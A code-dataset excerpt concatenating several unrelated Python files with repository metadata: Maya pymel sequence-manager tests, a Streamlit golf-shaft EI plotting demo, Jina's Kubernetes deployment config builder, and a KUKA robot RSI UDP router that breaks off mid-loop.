def test_to_edl_will_generate_a_proper_edl_content(self):
"""testing if to_edl will generate a proper edl content
"""
edl_path = os.path.abspath('./test_data/test_v001.edl')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_version('v001')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_shot_name_template('<Sequence>_<Shot>_<Version>')
sm.set_version('v001')
seq1 = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq1.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(33)
shot1.sequenceStartFrame.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot1.track.set(1)
shot2 = seq1.create_shot('0020')
shot2.startFrame.set(34)
shot2.endFrame.set(64)
shot2.sequenceStartFrame.set(35)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(10)
shot2.track.set(1)
shot3 = seq1.create_shot('0030')
shot3.startFrame.set(65)
shot3.endFrame.set(110)
shot3.sequenceStartFrame.set(66)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(10)
shot3.track.set(1)
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
l = sm.to_edl()
result = l.to_string()
with open(edl_path) as f:
expected_edl_content = f.read()
self.assertEqual(
expected_edl_content,
result
)
def test_generate_sequence_structure_returns_a_sequence_instance(self):
"""testing if generate_sequence_structure() method will return a
Sequence instance
"""
sm = pymel.core.PyNode('sequenceManager1')
seq1 = sm.create_sequence('sequence1')
shot1 = seq1.create_shot('shot1')
shot1.output.set('/tmp/shot1.mov')
shot2 = seq1.create_shot('shot2')
shot2.output.set('/tmp/shot2.mov')
result = sm.generate_sequence_structure()
self.assertIsInstance(
result,
Sequence
)
def test_generate_sequence_structure_will_generate_sequences_and_shots_with_correct_number_of_tracks(self):
"""testing if a proper sequence structure will be generated by using
the generate_sequence_structure() method with correct number of tracks
"""
path = os.path.abspath('./test_data/test_v001.xml')
sm = pymel.core.PyNode('sequenceManager1')
sm.from_xml(path)
seq1 = sm.sequences.get()[0]
shots = seq1.shots.get()
shot1 = shots[0]
shot2 = shots[1]
shot3 = shots[2]
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
seq = sm.generate_sequence_structure()
tracks = seq.media.video.tracks
self.assertEqual(len(tracks), 1)
track1 = tracks[0]
clips = track1.clips
self.assertEqual(len(clips), 3)
def test_set_shot_name_template_is_working_properly(self):
"""testing if set_shot_name_template() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('shot_name_template'))
test_template = '<Sequence>_<Shot>_<Version>'
sm.set_shot_name_template(test_template)
self.assertTrue(sm.hasAttr('shot_name_template'))
self.assertEqual(sm.shot_name_template.get(), test_template)
def test_get_shot_name_template_is_working_properly(self):
"""testing if set_shot_name_template() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('shot_name_template'))
test_template = '<Sequence>_<Shot>_<Version>'
sm.set_shot_name_template(test_template)
self.assertTrue(sm.hasAttr('shot_name_template'))
self.assertEqual(sm.get_shot_name_template(), test_template)
def test_get_shot_name_template_will_create_shot_name_template_attribute_if_missing(self):
"""testing if set_shot_name_template() will create the
shot_name_template attribute if missing
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('shot_name_template'))
result = sm.get_shot_name_template()
self.assertTrue(sm.hasAttr('shot_name_template'))
self.assertEqual(result, '<Sequence>_<Shot>_<Version>')
def test_set_version_is_working_properly(self):
"""testing if set_version() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('version'))
test_version = 'v001'
sm.set_version(test_version)
self.assertTrue(sm.hasAttr('version'))
self.assertEqual(sm.version.get(), test_version)
def test_get_version_is_working_properly(self):
"""testing if set_version() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('version'))
test_version = 'v001'
sm.set_version(test_version)
self.assertTrue(sm.hasAttr('version'))
self.assertEqual(sm.get_version(), test_version)
def test_get_version_will_create_attribute_if_missing(self):
"""testing if get_version() will create the missing version attribute
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('version'))
result = sm.get_version()
self.assertTrue(sm.hasAttr('version'))
self.assertEqual(result, '')
def test_set_task_name_is_working_properly(self):
"""testing if set_task_name() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('task_name'))
test_task_name = 'Animation'
sm.set_task_name(test_task_name)
self.assertTrue(sm.hasAttr('task_name'))
self.assertEqual(sm.task_name.get(), test_task_name)
def test_get_task_name_is_working_properly(self):
"""testing if set_task_name() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('task_name'))
test_task_name = 'Animation'
sm.set_task_name(test_task_name)
self.assertTrue(sm.hasAttr('task_name'))
self.assertEqual(sm.get_task_name(), test_task_name)
def test_get_task_name_will_create_attribute_if_missing(self):
"""testing if get_task_name() will create the missing task_name attribute
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('task_name'))
result = sm.get_task_name()
self.assertTrue(sm.hasAttr('task_name'))
self.assertEqual(result, '')
def test_set_take_name_is_working_properly(self):
"""testing if set_take_name() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('take_name'))
test_take_name = 'Main'
sm.set_take_name(test_take_name)
self.assertTrue(sm.hasAttr('take_name'))
self.assertEqual(sm.take_name.get(), test_take_name)
def test_get_take_name_is_working_properly(self):
"""testing if set_take_name() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('take_name'))
test_take_name = 'Main'
sm.set_take_name(test_take_name)
self.assertTrue(sm.hasAttr('take_name'))
self.assertEqual(sm.get_take_name(), test_take_name)
def test_get_take_name_will_create_attribute_if_missing(self):
"""testing if get_take_name() will create the missing take_name attribute
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('take_name'))
result = sm.get_take_name()
self.assertTrue(sm.hasAttr('take_name'))
self.assertEqual(result, '')
def test_generate_sequence_structure_is_working_properly(self):
"""testing if generate_sequence_structure() method is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
from anima.env import mayaEnv
mayaEnv.Maya.set_fps(fps=24)
sm.set_shot_name_template('<Sequence>_<Shot>_<Version>')
sm.set_version('v001')
seq1 = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq1.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(24)
shot1.sequenceStartFrame.set(0)
shot1.track.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot2 = seq1.create_shot('0020')
shot2.startFrame.set(10)
shot2.endFrame.set(35)
shot2.sequenceStartFrame.set(25)
shot2.track.set(1)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(15)
shot3 = seq1.create_shot('0030')
shot3.startFrame.set(25)
shot3.endFrame.set(50)
shot3.sequenceStartFrame.set(45)
shot3.track.set(2)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(20)
seq = sm.generate_sequence_structure()
self.assertIsInstance(seq, Sequence)
rate = seq.rate
self.assertEqual('24', rate.timebase)
self.assertEqual(False, rate.ntsc)
self.assertEqual('00:00:00:00', seq.timecode)
self.assertEqual(False, seq.ntsc)
media = seq.media
self.assertIsInstance(media, Media)
video = media.video
self.assertIsInstance(video, Video)
self.assertIsNone(media.audio)
self.assertEqual(2, len(video.tracks))
track1 = video.tracks[0]
self.assertIsInstance(track1, Track)
self.assertEqual(len(track1.clips), 2)
self.assertEqual(track1.enabled, True)
track2 = video.tracks[1]
self.assertIsInstance(track2, Track)
self.assertEqual(len(track2.clips), 1)
self.assertEqual(track2.enabled, True)
clip1 = track1.clips[0]
self.assertIsInstance(clip1, Clip)
self.assertEqual('Video', clip1.type)
self.assertEqual('SEQ001_HSNI_003_0010_v001', clip1.id)
self.assertEqual('SEQ001_HSNI_003_0010_v001', clip1.name)
self.assertEqual(10, clip1.in_) # handle
self.assertEqual(35, clip1.out) # handle + duration
self.assertEqual(0, clip1.start) # sequenceStartFrame
self.assertEqual(25, clip1.end) # sequenceEndFrame + 1
clip2 = track1.clips[1]
self.assertIsInstance(clip2, Clip)
self.assertEqual('Video', clip2.type)
self.assertEqual('SEQ001_HSNI_003_0020_v001', clip2.id)
self.assertEqual('SEQ001_HSNI_003_0020_v001', clip2.name)
self.assertEqual(15, clip2.in_) # handle
self.assertEqual(41, clip2.out) # handle + duration
self.assertEqual(25, clip2.start) # sequenceStartFrame
self.assertEqual(51, clip2.end) # sequenceEndFrame + 1
clip3 = track2.clips[0]
self.assertIsInstance(clip3, Clip)
self.assertEqual('Video', clip3.type)
self.assertEqual('SEQ001_HSNI_003_0030_v001', clip3.id)
self.assertEqual('SEQ001_HSNI_003_0030_v001', clip3.name)
self.assertEqual(20, clip3.in_) # startFrame
self.assertEqual(46, clip3.out) # endFrame + 1
self.assertEqual(45, clip3.start) # sequenceStartFrame
self.assertEqual(71, clip3.end) # sequenceEndFrame + 1
file1 = clip1.file
self.assertIsInstance(file1, File)
self.assertEqual('SEQ001_HSNI_003_0010_v001', file1.name)
self.assertEqual('file://localhost/tmp/SEQ001_HSNI_003_0010_v001.mov',
file1.pathurl)
self.assertEqual(45, file1.duration) # including handles
file2 = clip2.file
self.assertIsInstance(file2, File)
self.assertEqual('SEQ001_HSNI_003_0020_v001', file2.name)
self.assertEqual('file://localhost/tmp/SEQ001_HSNI_003_0020_v001.mov',
file2.pathurl)
self.assertEqual(56, file2.duration) # including handles
file3 = clip3.file
self.assertIsInstance(file3, File)
self.assertEqual('SEQ001_HSNI_003_0030_v001', file3.name)
self.assertEqual('file://localhost/tmp/SEQ001_HSNI_003_0030_v001.mov',
file3.pathurl)
self.assertEqual(66, file3.duration) # including handles
| 36.594724 | 111 | 0.639122 | [
"MIT"
] | Khosiyat/anima | tests/previs/test_sequence_manager_extension.py | 30,520 | Python |
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
##python3 script created by tBarford on 20220205
##
##
##File Description: This is the streamlit webapp MVP for BG Golf EI Profile Database Demo
## run in term w/ : streamlit run streamlit_app.py
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
import streamlit as st
import firestoreservice as fs
from matplotlib import pyplot as plt
import PIL as img
def main():
firestore = fs.FirestoreService()
## Sidebar
with st.sidebar:
st.subheader('Shaft Selection Tools:')
shaftType = st.selectbox('Type of shaft:', options = ['iron', 'wood'], key = 'type')
shaft = st.selectbox('Choose a shaft to display:', options = firestore.getShaftList(shaftType), key = 'shaft')
stiffness = st.selectbox('Choose a stiffness:', options = firestore.getStiffness(shaftType, shaft), key = 'stiff')
compare = st.radio('Compare another shaft?', options = ['No', 'Yes'])
if compare == 'Yes':
shaftType_compare = st.selectbox('Type of shaft:', options = ['iron', 'wood'], key = 'type2')
shaft_compare = st.selectbox('Choose a shaft to display:', options = firestore.getShaftList(shaftType_compare), key = 'shaft2')
stiffness_compare = st.selectbox('Choose a stiffness:', options = firestore.getStiffness(shaftType_compare, shaft_compare), key = 'stiff2')
else:
shaftType_compare, shaft_compare, stiffness_compare = None, None, None
## Main Content
st.image(img.Image.open('./assets/bg_logo_horz.png'), use_column_width=True)
st.header('Shaft Profile Demo')
#manage shafts to plot
if stiffness is not None:
dataToPlot = {f'{shaft} {stiffness}':firestore.getEI(shaftType, shaft, stiffness)}
if stiffness_compare is not None:
dataToPlot[f'{shaft_compare} {stiffness_compare}'] = firestore.getEI(shaftType_compare, shaft_compare, stiffness_compare)
if st.button('Update Plot'):
fig, ax = plt.subplots()
for each in dataToPlot.keys():
ax.plot(dataToPlot[each][0], dataToPlot[each][1], label = each)
ax.set(xlabel='Length From Tip (in.)', ylabel='EI',
title='BG Measured EI Curve')
ax.grid()
ax.legend()
st.pyplot(fig)
if __name__ == '__main__':
main() | 42.767857 | 152 | 0.612944 | [
"Apache-2.0"
] | tbarford/bg_streamlit_demo | streamlit_app.py | 2,395 | Python |
import copy
from argparse import Namespace
from typing import Dict, Union, List, Optional, Tuple
from jina import __default_executor__
from jina.enums import PodRoleType
from jina.excepts import NoContainerizedError
from jina.orchestrate.deployments.config.k8slib import kubernetes_deployment
from jina.orchestrate.deployments.config.helper import (
get_image_name,
to_compatible_name,
get_base_executor_version,
construct_runtime_container_args,
validate_uses,
)
from jina.serve.networking import K8sGrpcConnectionPool
from jina.orchestrate.deployments import BaseDeployment
class K8sDeploymentConfig:
"""
Class that implements the output of configuration files for Kubernetes for a given Deployment.
"""
class _K8sDeployment:
def __init__(
self,
name: str,
version: str,
pod_type: PodRoleType,
jina_deployment_name: str,
shard_id: Optional[int],
common_args: Union['Namespace', Dict],
deployment_args: Union['Namespace', Dict],
k8s_namespace: str,
k8s_connection_pool: bool = True,
k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
):
self.name = name
self.dns_name = to_compatible_name(name)
self.version = version
self.pod_type = pod_type
self.jina_deployment_name = jina_deployment_name
self.shard_id = shard_id
self.common_args = common_args
self.deployment_args = deployment_args
self.num_replicas = getattr(self.deployment_args, 'replicas', 1)
self.k8s_namespace = k8s_namespace
self.k8s_connection_pool = k8s_connection_pool
self.k8s_deployments_addresses = k8s_deployments_addresses
def get_gateway_yamls(
self,
) -> List[Dict]:
import os
test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
image_name = (
'jinaai/jina:test-pip'
if test_pip
else f'jinaai/jina:{self.version}-py38-standard'
)
cargs = copy.copy(self.deployment_args)
cargs.env = None
cargs.deployments_addresses = self.k8s_deployments_addresses
from jina.helper import ArgNamespace
from jina.parsers import set_gateway_parser
taboo = {
'uses_with',
'uses_metas',
'volumes',
'uses_before',
'uses_after',
'workspace',
'workspace_id',
'upload_files',
'noblock_on_start',
}
non_defaults = ArgNamespace.get_non_defaults_args(
cargs, set_gateway_parser(), taboo=taboo
)
_args = ArgNamespace.kwargs2list(non_defaults)
container_args = ['gateway'] + _args
if not cargs.k8s_connection_pool:
container_args.append('--k8s-disable-connection-pool')
return kubernetes_deployment.get_deployment_yamls(
self.dns_name,
namespace=self.k8s_namespace,
image_name=image_name,
container_cmd='["jina"]',
container_args=f'{container_args}',
replicas=1,
pull_policy='IfNotPresent',
jina_deployment_name='gateway',
pod_type=self.pod_type,
port=self.common_args.port,
env=cargs.env,
)
def _get_image_name(self, uses: Optional[str]):
import os
test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
image_name = (
'jinaai/jina:test-pip'
if test_pip
else f'jinaai/jina:{self.version}-py38-perf'
)
if uses is not None and uses != __default_executor__:
image_name = get_image_name(uses)
return image_name
def _get_container_args(self, cargs, pod_type):
uses_metas = cargs.uses_metas or {}
uses_with = self.deployment_args.uses_with
if cargs.uses != __default_executor__:
cargs.uses = 'config.yml'
return construct_runtime_container_args(
cargs, uses_metas, uses_with, pod_type
)
def get_runtime_yamls(
self,
) -> List[Dict]:
cargs = copy.copy(self.deployment_args)
image_name = self._get_image_name(cargs.uses)
image_name_uses_before = (
self._get_image_name(cargs.uses_before)
if hasattr(cargs, 'uses_before') and cargs.uses_before
else None
)
image_name_uses_after = (
self._get_image_name(cargs.uses_after)
if hasattr(cargs, 'uses_after') and cargs.uses_after
else None
)
container_args = self._get_container_args(cargs, pod_type=self.pod_type)
container_args_uses_before = None
if getattr(cargs, 'uses_before', False):
uses_before_cargs = copy.copy(cargs)
uses_before_cargs.uses = cargs.uses_before
uses_before_cargs.name = f'{self.common_args.name}/uses-before'
uses_before_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE
uses_before_cargs.uses_before_address = None
uses_before_cargs.uses_after_address = None
uses_before_cargs.uses_before = None
uses_before_cargs.uses_after = None
uses_before_cargs.uses_with = None
uses_before_cargs.uses_metas = None
uses_before_cargs.env = None
uses_before_cargs.connection_list = None
uses_before_cargs.runtime_cls = 'WorkerRuntime'
uses_before_cargs.pod_role = PodRoleType.WORKER
uses_before_cargs.polling = None
container_args_uses_before = self._get_container_args(
uses_before_cargs, PodRoleType.WORKER
)
container_args_uses_after = None
if getattr(cargs, 'uses_after', False):
uses_after_cargs = copy.copy(cargs)
uses_after_cargs.uses = cargs.uses_after
uses_after_cargs.name = f'{self.common_args.name}/uses-after'
uses_after_cargs.port = K8sGrpcConnectionPool.K8S_PORT_USES_AFTER
uses_after_cargs.uses_before_address = None
uses_after_cargs.uses_after_address = None
uses_after_cargs.uses_before = None
uses_after_cargs.uses_after = None
uses_after_cargs.uses_with = None
uses_after_cargs.uses_metas = None
uses_after_cargs.env = None
uses_after_cargs.connection_list = None
uses_after_cargs.runtime_cls = 'WorkerRuntime'
uses_after_cargs.pod_role = PodRoleType.WORKER
uses_after_cargs.polling = None
container_args_uses_after = self._get_container_args(
uses_after_cargs, PodRoleType.WORKER
)
return kubernetes_deployment.get_deployment_yamls(
self.dns_name,
namespace=self.k8s_namespace,
image_name=image_name,
image_name_uses_after=image_name_uses_after,
image_name_uses_before=image_name_uses_before,
container_cmd='["jina"]',
container_cmd_uses_before='["jina"]',
container_cmd_uses_after='["jina"]',
container_args=f'{container_args}',
container_args_uses_before=container_args_uses_before,
container_args_uses_after=container_args_uses_after,
replicas=self.num_replicas,
pull_policy='IfNotPresent',
jina_deployment_name=self.jina_deployment_name,
pod_type=self.pod_type,
shard_id=self.shard_id,
env=cargs.env,
gpus=cargs.gpus if hasattr(cargs, 'gpus') else None,
)
def __init__(
self,
args: Union['Namespace', Dict],
k8s_namespace: Optional[str] = None,
k8s_connection_pool: bool = True,
k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
):
# External Deployments should be ignored in a K8s based Flow
assert not (hasattr(args, 'external') and args.external)
if not validate_uses(args.uses):
raise NoContainerizedError(
f'Executor "{args.uses}" is not valid to be used in K8s. '
'You need to use a containerized Executor. You may check `jina hub --help` to see how Jina Hub can help you building containerized Executors.'
)
self.k8s_namespace = k8s_namespace
self.k8s_connection_pool = k8s_connection_pool
self.k8s_deployments_addresses = k8s_deployments_addresses
self.head_deployment = None
self.args = copy.copy(args)
if k8s_namespace is not None:
# otherwise it will remain with the one from the original Deployment
self.args.k8s_namespace = k8s_namespace
self.args.k8s_connection_pool = k8s_connection_pool
self.name = self.args.name
self.deployment_args = self._get_deployment_args(self.args)
if self.deployment_args['head_deployment'] is not None:
self.head_deployment = self._K8sDeployment(
name=self.deployment_args['head_deployment'].name,
version=get_base_executor_version(),
shard_id=None,
jina_deployment_name=self.name,
common_args=self.args,
deployment_args=self.deployment_args['head_deployment'],
pod_type=PodRoleType.HEAD,
k8s_namespace=self.k8s_namespace,
k8s_connection_pool=self.k8s_connection_pool,
k8s_deployments_addresses=self.k8s_deployments_addresses,
)
self.worker_deployments = []
deployment_args = self.deployment_args['deployments']
for i, args in enumerate(deployment_args):
name = f'{self.name}-{i}' if len(deployment_args) > 1 else f'{self.name}'
self.worker_deployments.append(
self._K8sDeployment(
name=name,
version=get_base_executor_version(),
shard_id=i,
common_args=self.args,
deployment_args=args,
pod_type=PodRoleType.WORKER
if name != 'gateway'
else PodRoleType.GATEWAY,
jina_deployment_name=self.name,
k8s_namespace=self.k8s_namespace,
k8s_connection_pool=self.k8s_connection_pool,
k8s_deployments_addresses=self.k8s_deployments_addresses
if name == 'gateway'
else None,
)
)
def _get_deployment_args(self, args):
parsed_args = {
'head_deployment': None,
'deployments': [],
}
shards = getattr(args, 'shards', 1)
uses_before = getattr(args, 'uses_before', None)
uses_after = getattr(args, 'uses_after', None)
if args.name != 'gateway':
parsed_args['head_deployment'] = BaseDeployment._copy_to_head_args(
self.args
)
parsed_args['head_deployment'].gpus = None
parsed_args['head_deployment'].port = K8sGrpcConnectionPool.K8S_PORT
parsed_args['head_deployment'].uses = None
parsed_args['head_deployment'].uses_metas = None
parsed_args['head_deployment'].uses_with = None
parsed_args['head_deployment'].env = None
# if the k8s connection pool is disabled, the connection pool is managed manually
if not self.k8s_connection_pool:
import json
connection_list = {}
for i in range(shards):
name = (
f'{to_compatible_name(self.name)}-{i}'
if shards > 1
else f'{to_compatible_name(self.name)}'
)
connection_list[
str(i)
] = f'{name}.{self.k8s_namespace}.svc:{K8sGrpcConnectionPool.K8S_PORT}'
parsed_args['head_deployment'].connection_list = json.dumps(
connection_list
)
if uses_before:
parsed_args[
'head_deployment'
].uses_before_address = (
f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_BEFORE}'
)
if uses_after:
parsed_args[
'head_deployment'
].uses_after_address = (
f'127.0.0.1:{K8sGrpcConnectionPool.K8S_PORT_USES_AFTER}'
)
for i in range(shards):
cargs = copy.deepcopy(args)
cargs.shard_id = i
cargs.uses_before = None
cargs.uses_after = None
if args.name != 'gateway':
cargs.port = K8sGrpcConnectionPool.K8S_PORT
cargs.uses_before_address = None
cargs.uses_after_address = None
if shards > 1:
cargs.name = f'{cargs.name}-{i}'
if args.name == 'gateway':
cargs.pod_role = PodRoleType.GATEWAY
# the worker runtimes do not care
else:
cargs.k8s_connection_pool = False
parsed_args['deployments'].append(cargs)
return parsed_args
def to_k8s_yaml(
self,
) -> List[Tuple[str, List[Dict]]]:
"""
Return a list of dictionary configurations. One for each deployment in this Deployment
.. # noqa: DAR201
.. # noqa: DAR101
"""
if self.name == 'gateway':
return [
(
'gateway',
self.worker_deployments[0].get_gateway_yamls(),
)
]
else:
deployments = [self.head_deployment]
deployments.extend(self.worker_deployments)
return [
(
deployment.dns_name,
deployment.get_runtime_yamls(),
)
for deployment in deployments
]
| 40.485014 | 158 | 0.573428 | [
"Apache-2.0"
] | ethan-jiang-1/jina | jina/orchestrate/deployments/config/k8s.py | 14,858 | Python |
#!/usr/bin/env python
# Copyright (c) 2014, Norwegian University of Science and Technology
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Author: Lars Tingelstad
# Maintainer: Lars Tingelstad <[email protected]>
import socket
import threading
import time
import numpy as np
import struct
import xml.etree.ElementTree as et
class UDPServerRealTime(threading.Thread):
def __init__(self,name, host, port, handshake=None):
threading.Thread.__init__(self)
self.daemon = True
self.name = name
self._host = host
self._port = port
self._handshake = handshake
self._timeout = None
self._timeout_count = 0
self._is_timed_out = False
self._max_timeout_count = None
self._lock = threading.Lock()
self._recv_data = None
self._send_data = None
self._remote_addr = None
self.is_connected = False
self._stop_flag = threading.Event()
self._disconnect_client_flag = threading.Event()
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.settimeout(self._timeout)
self._socket.bind((self._host, self._port))
def set_max_timeout_count(self, timeout_count):
self._max_timeout_count = timeout_count
def timeout(self):
return self._timeout
def set_timeout(self, timeout):
self._timeout = timeout
self._socket.settimeout(self._timeout)
def receive(self):
try:
#self._lock.acquire()
data, addr = self._socket.recvfrom(1024)
self._recv_data = data
#self._lock.release()
## Set connection if handshake mechanism is not used
if self._handshake is None and not self.is_connected:
self._remote_addr = addr
print("{name}: Got connection from: {addr}".format(name=self.name, addr=self._remote_addr))
self.is_connected = True
self._timeout_count = 0
return data
except socket.timeout, e:
if self._max_timeout_count is not None:
self._timeout_count += 1
print("{name}: Late package!".format(name=self.name))
if self._timeout_count > self._max_timeout_count:
print("{name}: Maximum timeouts. Disconnecting client: {addr}".format(name=self.name, addr=self._remote_addr))
self._disconnect_client_flag.set()
return None
def send(self, data):
#self._lock.acquire()
self._send_data = data
self._socket.sendto(self._send_data, self._remote_addr)
#self._lock.release()
def connect(self):
''' Create connection from external client '''
if self._handshake is not None:
if not self.is_connected:
self._socket.settimeout(None)
data, remote_addr = self._socket.recvfrom(1024)
if data == self._handshake:
self._remote_addr = remote_addr
print("{name}: Got connection from: {addr}".format(name=self.name, addr=self._remote_addr))
self.is_connected = True
else:
print("{name}: Could not accept connection from: {addr}".format(name=self.name, addr=remote_addr))
self._disconnect_client_flag.set()
else:
print("{name}: Can not create connection without handshake!".format(name=self.name))
if self._timeout is not None:
self._socket.settimeout(self._timeout)
def stop(self):
print("{name}: Stopping!".format(name=self.name))
self._stop_flag.set()
def disconnect(self):
#print("{name}: Disconnecting!".format(name=self.name))
self._disconnect_client_flag.set()
def run(self):
while not self._stop_flag.is_set():
print("{name}: Waiting for connection!".format(name=self.name))
if self._handshake is not None:
self.connect()
self._disconnect_client_flag.wait()
print("{name}: Disconnecting client".format(name=self.name))
self.is_connected = False
self._remote_addr = None
self._disconnect_client_flag.clear()
self.join()
class KUKARSIRouter(object):
def __init__(self):
self._lock = threading.Lock()
self._joint_correction = np.zeros(6).astype(np.float32)
self._joint_setpoint_position_init = None
#self._rsi_server = UDPServerRealTime('rsi server','localhost', 49152)
self._rsi_server = UDPServerRealTime('rsi server','192.168.1.67', 49152)
self._rsi_server.set_max_timeout_count(3)
self._ext_control_server = UDPServerRealTime('ext control server', 'localhost', 10000, "RSI")
self._ext_control_server.set_timeout(0.004)
self._ext_control_server.set_max_timeout_count(3)
def _parse_xml_from_robot(self, data):
root = et.fromstring(data)
# Cartesian actual position
RIst = root.find('RIst').attrib
cart_actual_pos = np.array([RIst['X'], RIst['Y'], RIst['Z'],
RIst['A'], RIst['B'], RIst['C']], dtype=np.float64)
# Cartesian setpoint position
RSol = root.find('RSol').attrib
cart_setpoint_pos = np.array([RSol['X'], RSol['Y'], RSol['Z'],
RSol['A'], RSol['B'], RSol['C']], dtype=np.float64)
# Axis actual
AIPos = root.find('AIPos').attrib
axis_actual_pos = np.array([AIPos['A1'], AIPos['A2'],AIPos['A3'],
AIPos['A4'], AIPos['A5'],AIPos['A6']], dtype=np.float64)
# Axis setpoint pos
ASPos = root.find('ASPos').attrib
axis_setpoint_pos = np.array([ASPos['A1'], ASPos['A2'],ASPos['A3'],
ASPos['A4'], ASPos['A5'],ASPos['A6']], dtype=np.float64)
# Number of late packages
Delay = root.find('Delay').attrib
n_late_packages = int(Delay['D'])
# IPOC number
IPOC = int(root.find('IPOC').text)
return axis_actual_pos, axis_setpoint_pos, n_late_packages, IPOC
def _create_xml_to_robot(self, desired_axis_corr, ipoc_cycle_num):
dac = desired_axis_corr
sen = et.Element('Sen', {'Type':'ImFree'})
akorr = et.SubElement(sen, 'AK', {'A1':str(dac[0]),
'A2':str(dac[1]),
'A3':str(dac[2]),
'A4':str(dac[3]),
'A5':str(dac[4]),
'A6':str(dac[5])})
ipoc = et.SubElement(sen, 'IPOC').text = str(ipoc_cycle_num)
return et.tostring(sen)
def _create_joint_pos_packet(self, ipoc, axis_actual_pos):
return struct.pack('Q6d', ipoc, *axis_actual_pos)
def _parse_joint_pos_packet(self, packet):
data = struct.unpack('Q6d', packet)
ipoc = data[0]
q_desired = np.array(data[1:], dtype=np.float64)
return ipoc, q_desired
def run(self):
self._ext_control_server.start()
self._rsi_server.start()
#while not self._stop_flag.is_set():
while True:
## Receive rsi packet from robot. This is a blocking call if no rsi
## is connected. The timeout is set to 4ms when the robot connects,
## and is reset to None when the robot disconnects.
data = self._rsi_server.receive()
if self._rsi_server.is_connected:
## Set timeout of receive for RSI client when robot connects
if self._rsi_server.timeout() is None:
self._rsi_server.set_timeout(0.004)
## Only parse rsi packet if content is not None
if data is not None:
## Parse rsi packet xml document
q_actual, q_setpoint, late_packages, ipoc = self._parse_xml_from_robot(data)
if self._joint_setpoint_position_init is None:
self._joint_setpoint_position_init = q_setpoint
if self._ext_control_server.is_connected:
ipoc_out = ipoc
## Create joint position packet to send to external control client
packet = self._create_joint_pos_packet(ipoc_out, q_actual)
## Send send joint position packet to external control client
self._ext_control_server.send(packet)
## Receive desired joint position packet
data = self._ext_control_server.receive()
if data is not None:
## parse data from client
ipoc_in, q_desired = self._parse_joint_pos_packet(data)
print(q_desired)
## check if the received ipoc timestamp is equal to
## the received ipoc timestamp from the external
## control client
if ipoc_in == ipoc_out:
## The joint correction is equal to the desired joint
